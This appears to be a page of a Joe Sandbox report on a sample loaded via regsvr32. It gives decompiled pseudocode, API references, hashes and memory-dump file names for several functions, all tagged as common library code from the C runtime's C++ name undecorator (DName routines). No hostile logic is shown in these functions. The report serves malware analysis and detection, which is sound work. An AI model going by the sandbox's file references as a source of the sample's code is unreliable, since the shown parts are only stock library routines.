				intOrPtr* _t35;
				char* _t36;
				long long* _t39;
				long long _t44;

				_a8 = __rbx;
				_t35 =  *0x2b0c9a70; // 0x0
				_v48 = _v48 & 0xffff0000;
				_t39 = __rcx;
				_v56 = __rcx;
				if ( *_t35 == 0) goto 0x2b06b579;
				_t13 =  *_t35;
				if (_t13 - 0x30 < 0) goto 0x2b06b569;
				if (_t13 - 0x31 <= 0) goto 0x2b06b4ff;
				if (_t13 - 0x33 <= 0) goto 0x2b06b4f6;
				if (_t13 == 0x34) goto 0x2b06b50f;
				if (_t13 == 0x35) goto 0x2b06b4ed;
				if (_t13 - 0x36 - 1 > 0) goto 0x2b06b569;
				goto 0x2b06b506;
				goto 0x2b06b506;
				goto 0x2b06b506;
				E00007FFD7FFD2B06AD7C( &_v56, "char ");
				_t36 =  *0x2b0c9a70; // 0x0
				_t20 =  *_t36;
				 *0x2b0c9a70 =  *0x2b0c9a70 + 1;
				if (_t20 == 0x31) goto 0x2b06b53a;
				if (_t20 == 0x33) goto 0x2b06b53a;
				if (_t20 == 0x35) goto 0x2b06b53a;
				if (_t20 == 0x37) goto 0x2b06b53a;
				asm("movaps xmm0, [ebp-0x30]");
				goto 0x2b06b563;
				E00007FFD7FFD2B06A9E0( &_v24, "unsigned ");
				_t44 =  &_v40;
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x20], xmm0");
				E00007FFD7FFD2B06AC78(_t36, _t44,  &_v56);
				asm("movaps xmm0, [ebp-0x20]");
				asm("movdqu [ebx], xmm0");
				goto 0x2b06b586;
				 *(_t39 + 8) =  *(_t39 + 8) & 0xffff00ff;
				 *_t39 = _t44;
				 *(_t39 + 8) = 2;
				goto 0x2b06b586;
				return E00007FFD7FFD2B06A490(1, _t36, _t39);
			}

0x7ffd2b06b494
0x7ffd2b06b4a1
0x7ffd2b06b4a8
0x7ffd2b06b4af
0x7ffd2b06b4b4
0x7ffd2b06b4ba
0x7ffd2b06b4c0
0x7ffd2b06b4c4
0x7ffd2b06b4cc
0x7ffd2b06b4d0
0x7ffd2b06b4d4
0x7ffd2b06b4d8
0x7ffd2b06b4de
0x7ffd2b06b4eb
0x7ffd2b06b4f4
0x7ffd2b06b4fd
0x7ffd2b06b50a
0x7ffd2b06b50f
0x7ffd2b06b516
0x7ffd2b06b519
0x7ffd2b06b523
0x7ffd2b06b528
0x7ffd2b06b52d
0x7ffd2b06b532
0x7ffd2b06b534
0x7ffd2b06b538
0x7ffd2b06b545
0x7ffd2b06b54e
0x7ffd2b06b552
0x7ffd2b06b555
0x7ffd2b06b55a
0x7ffd2b06b55f
0x7ffd2b06b563
0x7ffd2b06b567
0x7ffd2b06b569
0x7ffd2b06b570
0x7ffd2b06b573
0x7ffd2b06b577
0x7ffd2b06b593

APIs

DName::operator=.LIBCMT ref: 00007FFD2B06B50A
DName::DName.LIBCMT ref: 00007FFD2B06B545
DName::operator+=.LIBCMT ref: 00007FFD2B06B55A

Strings

int , xrefs: 00007FFD2B06B4ED
unsigned , xrefs: 00007FFD2B06B53A
long , xrefs: 00007FFD2B06B4E4
char , xrefs: 00007FFD2B06B4FF
short , xrefs: 00007FFD2B06B4F6

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: NameName::Name::operator+=Name::operator=
String ID: char $int $long $short $unsigned
API String ID: 2246115127-3894466517
Opcode ID: 1243f92251c8e19eea035179f36734e9d5a2edfa9e2e6b8ac2dd73cf8380ae09
Instruction ID: 4932fd5185c8f670d6e5fbcb5e16f7fd47dfa36f13b4bba1dfd66ab7776a78ba
Opcode Fuzzy Hash: 1243f92251c8e19eea035179f36734e9d5a2edfa9e2e6b8ac2dd73cf8380ae09
Instruction Fuzzy Hash: A53176A1F1E65688FB179B289E731FC23A1AF47744F844131D64E056B9DFACE581E380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06B69C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 57%

			E00007FFD7FFD2B06B69C(void* __edx, void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, void* __rsi, void* __r8, void* __r11, long long _a8, long long _a16) {
				char _v24;
				char _v40;
				signed int _v48;
				char _v56;
				char* _t34;
				long long _t35;
				long long _t38;
				void* _t54;

				_a8 = __rbx;
				_a16 = __rdi;
				_t34 =  *0x2b0c9a70; // 0x0
				_t54 = __rcx;
				if ( *_t34 == 0) goto 0x2b06b71f;
				if ( *_t34 != 0x5a) goto 0x2b06b6e5;
				_t35 = _t34 + 1;
				_v48 = _v48 & 0xffff0000;
				_v56 = __rbx;
				asm("movups xmm0, [ebp-0x30]");
				 *0x2b0c9a70 = _t35;
				asm("movdqu [ecx], xmm0");
				goto 0x2b06b77b;
				_t6 =  &_v40; // -47
				E00007FFD7FFD2B06B594(__edx, __esi, _t6, __rdx, __rsi, __r8, __r11);
				_t7 =  &_v24; // -31
				_t38 = _t35;
				E00007FFD7FFD2B06A9E0(_t7, " throw(");
				_t8 =  &_v56; // -63
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t35, _t8, _t38);
				asm("movups xmm5, [ebp-0x30]");
				asm("movdqu [edi], xmm5");
				goto 0x2b06b771;
				_t9 =  &_v24; // -31
				E00007FFD7FFD2B06A9E0(_t9, " throw(");
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x30], xmm0");
				if (_v48 - 1 > 0) goto 0x2b06b769;
				if (_v56 == _t38) goto 0x2b06b75b;
				E00007FFD7FFD2B06A12C(1, " throw(");
				_t12 =  &_v56; // -63
				E00007FFD7FFD2B06A564(_t35, _t38, _t12, _t35, __r8);
				goto 0x2b06b769;
				_t13 =  &_v56; // -63
				E00007FFD7FFD2B06A640(1, _t35, _t13);
				asm("movups xmm0, [ebp-0x30]");
				asm("movdqu [edi], xmm0");
				return E00007FFD7FFD2B06AF5C(0x29, __esi, _t35, _t38, _t54, __rsi, __r8);
			}

0x7ffd2b06b69c
0x7ffd2b06b6a1
0x7ffd2b06b6ae
0x7ffd2b06b6b7
0x7ffd2b06b6bc
0x7ffd2b06b6c1
0x7ffd2b06b6c3
0x7ffd2b06b6c6
0x7ffd2b06b6cd
0x7ffd2b06b6d1
0x7ffd2b06b6d5
0x7ffd2b06b6dc
0x7ffd2b06b6e0
0x7ffd2b06b6e5
0x7ffd2b06b6e9
0x7ffd2b06b6f5
0x7ffd2b06b6f9
0x7ffd2b06b6fc
0x7ffd2b06b701
0x7ffd2b06b708
0x7ffd2b06b70b
0x7ffd2b06b710
0x7ffd2b06b715
0x7ffd2b06b719
0x7ffd2b06b71d
0x7ffd2b06b726
0x7ffd2b06b72a
0x7ffd2b06b72f
0x7ffd2b06b732
0x7ffd2b06b73b
0x7ffd2b06b741
0x7ffd2b06b748
0x7ffd2b06b74d
0x7ffd2b06b754
0x7ffd2b06b759
0x7ffd2b06b75b
0x7ffd2b06b764
0x7ffd2b06b769
0x7ffd2b06b76d
0x7ffd2b06b78d

APIs

DName::DName.LIBCMT ref: 00007FFD2B06B6FC
DName::operator+=.LIBCMT ref: 00007FFD2B06B710
DName::DName.LIBCMT ref: 00007FFD2B06B72A
DNameStatusNode::make.LIBCMT ref: 00007FFD2B06B748
DName::append.LIBCMT ref: 00007FFD2B06B754
DName::operator+=.LIBCMT ref: 00007FFD2B06B776

Strings

throw(, xrefs: 00007FFD2B06B6EE, 00007FFD2B06B71F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name$Name::Name::operator+=$Name::appendNode::makeStatus
String ID: throw(
API String ID: 1273216807-3159766648
Opcode ID: 6ed7ac167c6794ebb61a8798f0f8af70d9180646039040b14f5f680f2cadbfa9
Instruction ID: 6297cf25d507298808457f742909b6d49cb7f2054cb84d9f275d90f8938bef4f
Opcode Fuzzy Hash: 6ed7ac167c6794ebb61a8798f0f8af70d9180646039040b14f5f680f2cadbfa9
Instruction Fuzzy Hash: 87218662F19B5688F702DB65DE624FC2360BB5A744F449130EF5D166A6DFBCE180D380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06B790 Relevance: 13.6, APIs: 9, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E00007FFD7FFD2B06B790(void* __esi, void* __eflags, void* __rax, long long __rbx, signed long long* __rcx, long long* __rdx, long long __rdi, void* __rsi, signed int __r8, void* __r10, long long __r12, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				char _v24;
				char _v40;
				signed int _v48;
				signed int _v56;
				char _v72;
				void* _t44;
				void* _t53;
				void* _t80;
				char* _t81;
				char* _t83;
				signed long long* _t90;
				long long _t93;
				char* _t94;
				long long _t105;
				intOrPtr* _t115;
				long long* _t124;

				_t122 = __r8;
				_t117 = __rsi;
				_t80 = __rax;
				_a8 = __rbx;
				_a16 = __rdi;
				_a24 = __r12;
				r10d = _v48;
				_v56 = _v56 & 0x00000000;
				_t90 = __rcx;
				_t93 =  *0x2b0c9a70; // 0x0
				_t124 = __rdx;
				r10d = r10d & 0xffff0000;
				r12d = 1;
				_t115 = __r8;
				_v48 = r10d;
				_t94 = _t93 + __r12;
				 *0x2b0c9a70 = _t94;
				r8d =  *_t94;
				if (__eflags == 0) goto 0x2b06b99a;
				if (__eflags == 0) goto 0x2b06b95a;
				if (__eflags == 0) goto 0x2b06b94e;
				if ( *_t94 == 0) goto 0x2b06b93e;
				if ( *((intOrPtr*)(_t94 + 1)) == 0) goto 0x2b06b93e;
				if (r9d == 0) goto 0x2b06b828;
				__rcx[1] = __rcx[1] & 0xffff00ff;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] = 2;
				goto 0x2b06b9dc;
				r8d = r8d + r8d;
				 *0x2b0c9a70 = _t94 + 2;
				if (__rax + __r8 * 8 - 0x330 - r12d <= 0) goto 0x2b06b897;
				_v56 = _v56 & 0x00000000;
				r10d = r10d & 0xffffff00;
				_t17 =  &_v72; // -159
				r10d = r10d & 0xffff00ff;
				_t18 =  &_v56; // -143
				r8d = r12d;
				_v48 = r10d;
				_v72 = 0x2c;
				_t44 = E00007FFD7FFD2B06A8FC(__rax, __rcx, _t18, _t17, __rsi, __r8);
				_t21 =  &_v24; // -111
				E00007FFD7FFD2B06AB18(_t44, _t21, _t17, _t117, __r10);
				_t22 =  &_v40; // -127
				asm("movaps xmm0, [ebp-0x30]");
				asm("movdqa [ebp-0x20], xmm0");
				E00007FFD7FFD2B06AC78(_t80, _t22, _t80);
				asm("movaps xmm5, [ebp-0x20]");
				goto 0x2b06b89b;
				asm("movaps xmm5, [ebp-0x30]");
				_t23 =  &_v40; // -127
				asm("movdqa [ebp-0x20], xmm5");
				E00007FFD7FFD2B06AF5C(0x3e, __esi, _t80, __rcx, _t23, _t117, _t122);
				_t81 =  *0x2b0c9a70; // 0x0
				asm("movaps xmm5, [ebp-0x20]");
				asm("movdqa [ebp-0x30], xmm5");
				if ( *_t81 != 0x24) goto 0x2b06b8cc;
				 *0x2b0c9a70 = _t81 + __r12;
				goto 0x2b06b8ec;
				_t24 =  &_v40; // -127
				asm("movdqa [ebp-0x20], xmm5");
				E00007FFD7FFD2B06AF5C(0x5e, __esi, _t81 + __r12, _t90, _t24, _t117, _t122);
				_t83 =  *0x2b0c9a70; // 0x0
				asm("movaps xmm5, [ebp-0x20]");
				asm("movdqa [ebp-0x30], xmm5");
				if ( *_t83 == 0) goto 0x2b06b8fd;
				_t84 = _t83 + __r12;
				 *0x2b0c9a70 = _t83 + __r12;
				goto 0x2b06b92c;
				if (_v48 - r12b > 0) goto 0x2b06b92c;
				if (_v56 == 0) goto 0x2b06b920;
				E00007FFD7FFD2B06A12C(r12d, _t80);
				_t27 =  &_v56; // -143
				E00007FFD7FFD2B06A564(_t83 + __r12, _t90, _t27, _t83 + __r12, _t122);
				goto 0x2b06b92c;
				_t28 =  &_v56; // -143
				E00007FFD7FFD2B06A640(r12d, _t84, _t28);
				asm("bts dword [ebp-0x28], 0xe");
				asm("movaps xmm0, [ebp-0x30]");
				asm("movdqu [ebx], xmm0");
				goto 0x2b06b9dc;
				E00007FFD7FFD2B06A490(r12d, _t84, _t90);
				goto 0x2b06b9dc;
				 *_t124 = 0x2b083930;
				goto 0x2b06b991;
				if (r9d != 0) goto 0x2b06b814;
				_v56 = _v56 & 0x00000000;
				r10d = r10d & 0xffffff00;
				_t31 =  &_v72; // -159
				r10d = r10d & 0xffff00ff;
				_t32 =  &_v56; // -143
				r8d = r12d;
				 *_t115 = r12b;
				_v72 = 0x3e;
				_v48 = r10d;
				_t53 = E00007FFD7FFD2B06A8FC(_t84, _t90, _t32, _t31, _t117, _t122);
				 *0x2b0c9a70 =  *0x2b0c9a70 + __r12;
				goto 0x2b06b9cd;
				if (r9d != 0) goto 0x2b06b9c3;
				_t87 =  ==  ? 0x2b083930 : 0x2b083910;
				 *_t124 =  ==  ? 0x2b083930 : 0x2b083910;
				_t105 =  *0x2b0c9a70; // 0x0
				 *0x2b0c9a70 = _t105 + __r12;
				 *_t90 =  *_t90 & 0x00000000;
				_t90[1] = 0;
				_t90[1] = _t90[1] & 0xffff00ff;
				return _t53;
			}

0x7ffd2b06b790
0x7ffd2b06b790
0x7ffd2b06b790
0x7ffd2b06b790
0x7ffd2b06b795
0x7ffd2b06b79a
0x7ffd2b06b7a7
0x7ffd2b06b7ab
0x7ffd2b06b7b0
0x7ffd2b06b7b3
0x7ffd2b06b7ba
0x7ffd2b06b7bd
0x7ffd2b06b7c4
0x7ffd2b06b7ca
0x7ffd2b06b7cd
0x7ffd2b06b7d1
0x7ffd2b06b7d4
0x7ffd2b06b7db
0x7ffd2b06b7e5
0x7ffd2b06b7ed
0x7ffd2b06b7f5
0x7ffd2b06b7fe
0x7ffd2b06b809
0x7ffd2b06b812
0x7ffd2b06b814
0x7ffd2b06b81b
0x7ffd2b06b81f
0x7ffd2b06b823
0x7ffd2b06b828
0x7ffd2b06b83a
0x7ffd2b06b844
0x7ffd2b06b846
0x7ffd2b06b84b
0x7ffd2b06b852
0x7ffd2b06b856
0x7ffd2b06b85d
0x7ffd2b06b861
0x7ffd2b06b864
0x7ffd2b06b868
0x7ffd2b06b86c
0x7ffd2b06b871
0x7ffd2b06b877
0x7ffd2b06b87c
0x7ffd2b06b880
0x7ffd2b06b887
0x7ffd2b06b88c
0x7ffd2b06b891
0x7ffd2b06b895
0x7ffd2b06b897
0x7ffd2b06b89b
0x7ffd2b06b8a1
0x7ffd2b06b8a6
0x7ffd2b06b8ab
0x7ffd2b06b8b2
0x7ffd2b06b8b9
0x7ffd2b06b8be
0x7ffd2b06b8c3
0x7ffd2b06b8ca
0x7ffd2b06b8cc
0x7ffd2b06b8d2
0x7ffd2b06b8d7
0x7ffd2b06b8dc
0x7ffd2b06b8e3
0x7ffd2b06b8e7
0x7ffd2b06b8ef
0x7ffd2b06b8f1
0x7ffd2b06b8f4
0x7ffd2b06b8fb
0x7ffd2b06b901
0x7ffd2b06b908
0x7ffd2b06b90d
0x7ffd2b06b912
0x7ffd2b06b919
0x7ffd2b06b91e
0x7ffd2b06b920
0x7ffd2b06b927
0x7ffd2b06b92c
0x7ffd2b06b931
0x7ffd2b06b935
0x7ffd2b06b939
0x7ffd2b06b944
0x7ffd2b06b949
0x7ffd2b06b955
0x7ffd2b06b958
0x7ffd2b06b95d
0x7ffd2b06b963
0x7ffd2b06b968
0x7ffd2b06b96f
0x7ffd2b06b973
0x7ffd2b06b97a
0x7ffd2b06b97e
0x7ffd2b06b981
0x7ffd2b06b984
0x7ffd2b06b988
0x7ffd2b06b98c
0x7ffd2b06b991
0x7ffd2b06b998
0x7ffd2b06b99d
0x7ffd2b06b9b5
0x7ffd2b06b9b9
0x7ffd2b06b9bc
0x7ffd2b06b9c6
0x7ffd2b06b9cd
0x7ffd2b06b9d1
0x7ffd2b06b9d5
0x7ffd2b06b9f4

APIs

DName::doPchar.LIBCMT ref: 00007FFD2B06B86C
DName::DName.LIBCMT ref: 00007FFD2B06B877
DName::operator+=.LIBCMT ref: 00007FFD2B06B88C
DName::operator+=.LIBCMT ref: 00007FFD2B06B8A6
DName::doPchar.LIBCMT ref: 00007FFD2B06B98C

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::doName::operator+=Pchar$NameName::
String ID:
API String ID: 2781464480-0
Opcode ID: 99671a4e335a8329cffdfb9985cf23364a79fa902206f28572c9fbdf4b870813
Instruction ID: f1e8ab26df7de22a1884bbd890f2de0a81e7e21744facbfbb7c4eb0f9f8d8a76
Opcode Fuzzy Hash: 99671a4e335a8329cffdfb9985cf23364a79fa902206f28572c9fbdf4b870813
Instruction Fuzzy Hash: AE71A062F2AB5288F7138B65DD623BC27B0BB1A348F544134DE4E167A9CFBC9541D390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06B32C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00007FFD7FFD2B06B32C(void* __edx, void* __rax, long long __rbx, signed long long* __rcx, long long __rdi, long long __rsi, void* __r10, void* __r11, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				void* _t22;
				signed int _t24;
				void* _t29;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t52;
				long long _t77;
				char* _t78;
				char* _t84;
				char* _t85;
				long long _t86;
				intOrPtr* _t87;

				_t77 = __rsi;
				_t52 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t84 =  *0x2b0c9a70; // 0x0
				r9b = __edx;
				_t4 = _t77 + 1; // 0x1
				r10d = _t4;
				if ( *_t84 != 0x51) goto 0x2b06b36d;
				_t85 = _t84 + __r10;
				_t78 = "`non-type-template-parameter";
				 *0x2b0c9a70 = _t85;
				if ( *_t85 != 0) goto 0x2b06b381;
				_t22 = E00007FFD7FFD2B06A490(r10d, __rax, __rcx);
				goto 0x2b06b47b;
				if (_t22 - 0x30 < 0) goto 0x2b06b3b4;
				if (_t22 - 0x39 > 0) goto 0x2b06b3b4;
				_t86 = _t85 + __r10;
				_t24 =  *_t85 - 0x2f;
				 *0x2b0c9a70 = _t86;
				if (_t78 == 0) goto 0x2b06b3ab;
				goto 0x2b06b43d;
				goto 0x2b06b46f;
				r11b = 0x40;
				goto 0x2b06b3e4;
				if (_t24 == 0) goto 0x2b06b421;
				if (_t24 - 0x41 < 0) goto 0x2b06b410;
				if (_t24 - 0x50 > 0) goto 0x2b06b410;
				_t87 = _t86 + __r10;
				 *0x2b0c9a70 = _t87;
				if ( *_t87 != r11b) goto 0x2b06b3bb;
				 *0x2b0c9a70 = _t87 + __r10;
				if ( *_t87 != r11b) goto 0x2b06b410;
				if (r9b == 0) goto 0x2b06b434;
				if (_t78 == 0) goto 0x2b06b429;
				_t29 = E00007FFD7FFD2B06ABA8( *_t87,  &_v24, (_t24 << 4) + _t24 - 0x41, _t78, __r11);
				goto 0x2b06b442;
				__rcx[1] = __rcx[1] & 0xffff00ff;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] = 2;
				goto 0x2b06b47b;
				goto 0x2b06b374;
				_t30 = E00007FFD7FFD2B06ABA8(_t29,  &_v56, (_t24 << 4) + _t24 - 0x41, _t78, __r11);
				goto 0x2b06b474;
				if (_t78 == 0) goto 0x2b06b46b;
				E00007FFD7FFD2B06AB18(_t30,  &_v24, (_t24 << 4) + _t24 - 0x41, _t78, __r10);
				E00007FFD7FFD2B06A9E0( &_v40, _t78);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x40], xmm0");
				_t33 = E00007FFD7FFD2B06AC78(_t52,  &_v72, _t52);
				goto 0x2b06b474;
				_t34 = E00007FFD7FFD2B06AB18(_t33,  &_v56, _t52, _t78, __r10);
				asm("movups xmm0, [eax]");
				asm("movdqu [edi], xmm0");
				return _t34;
			}

0x7ffd2b06b32c
0x7ffd2b06b32c
0x7ffd2b06b32c
0x7ffd2b06b331
0x7ffd2b06b336
0x7ffd2b06b343
0x7ffd2b06b34c
0x7ffd2b06b356
0x7ffd2b06b356
0x7ffd2b06b35a
0x7ffd2b06b35c
0x7ffd2b06b35f
0x7ffd2b06b366
0x7ffd2b06b372
0x7ffd2b06b377
0x7ffd2b06b37c
0x7ffd2b06b383
0x7ffd2b06b387
0x7ffd2b06b38d
0x7ffd2b06b390
0x7ffd2b06b393
0x7ffd2b06b3a0
0x7ffd2b06b3a6
0x7ffd2b06b3af
0x7ffd2b06b3b6
0x7ffd2b06b3b9
0x7ffd2b06b3bd
0x7ffd2b06b3c1
0x7ffd2b06b3c5
0x7ffd2b06b3d7
0x7ffd2b06b3da
0x7ffd2b06b3e7
0x7ffd2b06b3ef
0x7ffd2b06b3f9
0x7ffd2b06b3fe
0x7ffd2b06b403
0x7ffd2b06b409
0x7ffd2b06b40e
0x7ffd2b06b410
0x7ffd2b06b417
0x7ffd2b06b41b
0x7ffd2b06b41f
0x7ffd2b06b424
0x7ffd2b06b42d
0x7ffd2b06b432
0x7ffd2b06b437
0x7ffd2b06b43d
0x7ffd2b06b44c
0x7ffd2b06b458
0x7ffd2b06b45b
0x7ffd2b06b460
0x7ffd2b06b469
0x7ffd2b06b46f
0x7ffd2b06b474
0x7ffd2b06b477
0x7ffd2b06b493

APIs

DName::DName.LIBCMT ref: 00007FFD2B06B409
DName::DName.LIBCMT ref: 00007FFD2B06B43D

Part of subcall function 00007FFD2B06AB18: DName::doPchar.LIBCMT ref: 00007FFD2B06AB8C

DName::DName.LIBCMT ref: 00007FFD2B06B44C
DName::operator+=.LIBCMT ref: 00007FFD2B06B460
DName::DName.LIBCMT ref: 00007FFD2B06B46F

Strings

`non-type-template-parameter, xrefs: 00007FFD2B06B35F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: NameName::$Name::doName::operator+=Pchar
String ID: `non-type-template-parameter
API String ID: 1070866305-4247534891
Opcode ID: ebfb67ad80e1486a4e21ed64bc85b18c645d60f7a7fcbe1c197d33356fb7316f
Instruction ID: 66a0345e620fc0f4989fb263fad8db00a4f73f397a5860400837919e2f061d35
Opcode Fuzzy Hash: ebfb67ad80e1486a4e21ed64bc85b18c645d60f7a7fcbe1c197d33356fb7316f
Instruction Fuzzy Hash: B841C6A1F0AA6288FA129B659E632BC2361BF16780F444031DA5D176A6DF6CE552E380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06B594 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 54%

			E00007FFD7FFD2B06B594(void* __edx, void* __esi, long long* __rcx, void* __rdx, void* __rsi, void* __r8, long long __r11) {
				intOrPtr _v16;
				char _v24;
				void* __rbx;
				void* _t19;
				void* _t21;
				char* _t31;
				char* _t32;
				char* _t34;
				long long _t35;
				char* _t37;
				long long* _t40;
				void* _t48;
				long long _t52;

				_t52 = __r11;
				_t50 = __rsi;
				_t21 = __esi;
				_t31 =  *0x2b0c9a70; // 0x0
				_t40 = __rcx;
				if ( *_t31 == 0x58) goto 0x2b06b67c;
				if ( *_t31 == 0x5a) goto 0x2b06b651;
				_t1 =  &_v24; // 0x11
				E00007FFD7FFD2B06B06C(__rcx, _t1, __rdx, __rsi, __r8);
				r11d = 0;
				if (_v16 != r11b) goto 0x2b06b646;
				_t32 =  *0x2b0c9a70; // 0x0
				if ( *_t32 == r11b) goto 0x2b06b646;
				if ( *_t32 == 0x40) goto 0x2b06b63c;
				if ( *_t32 == 0x5a) goto 0x2b06b5f3;
				 *(_t40 + 8) =  *(_t40 + 8) & 0xffff00ff;
				 *_t40 = _t52;
				 *(_t40 + 8) = 2;
				goto 0x2b06b692;
				asm("movaps xmm0, [esp+0x20]");
				 *0x2b0c9a70 = _t32 + 1;
				_t6 =  &_v24; // 0x11
				asm("movdqa [esp+0x20], xmm0");
				_t34 = ",...";
				_t46 =  !=  ? _t34 : ",<ellipsis>";
				E00007FFD7FFD2B06AFE0(_t19, _t21, _t34, _t40, _t6,  !=  ? _t34 : ",<ellipsis>", _t50, __r8);
				asm("movaps xmm5, [esp+0x20]");
				asm("movdqu [ebx], xmm5");
				goto 0x2b06b692;
				_t35 = _t34 + 1;
				 *0x2b0c9a70 = _t35;
				asm("movaps xmm0, [esp+0x20]");
				asm("movdqu [ebx], xmm0");
				goto 0x2b06b692;
				 *0x2b0c9a70 = _t35 + 1;
				_t37 = "...";
				_t48 =  !=  ? _t37 : "<ellipsis>";
				goto 0x2b06b68d;
				 *0x2b0c9a70 = _t37 + 1;
				return E00007FFD7FFD2B06A9E0(_t6, "void");
			}

0x7ffd2b06b594
0x7ffd2b06b594
0x7ffd2b06b594
0x7ffd2b06b59a
0x7ffd2b06b5a1
0x7ffd2b06b5a7
0x7ffd2b06b5b0
0x7ffd2b06b5b6
0x7ffd2b06b5bb
0x7ffd2b06b5c0
0x7ffd2b06b5c8
0x7ffd2b06b5ca
0x7ffd2b06b5d4
0x7ffd2b06b5d9
0x7ffd2b06b5de
0x7ffd2b06b5e0
0x7ffd2b06b5e7
0x7ffd2b06b5ea
0x7ffd2b06b5ee
0x7ffd2b06b5f3
0x7ffd2b06b602
0x7ffd2b06b60f
0x7ffd2b06b614
0x7ffd2b06b621
0x7ffd2b06b628
0x7ffd2b06b62c
0x7ffd2b06b631
0x7ffd2b06b636
0x7ffd2b06b63a
0x7ffd2b06b63c
0x7ffd2b06b63f
0x7ffd2b06b646
0x7ffd2b06b64b
0x7ffd2b06b64f
0x7ffd2b06b65b
0x7ffd2b06b66f
0x7ffd2b06b676
0x7ffd2b06b67a
0x7ffd2b06b686
0x7ffd2b06b69a

APIs

DName::DName.LIBCMT ref: 00007FFD2B06B68D

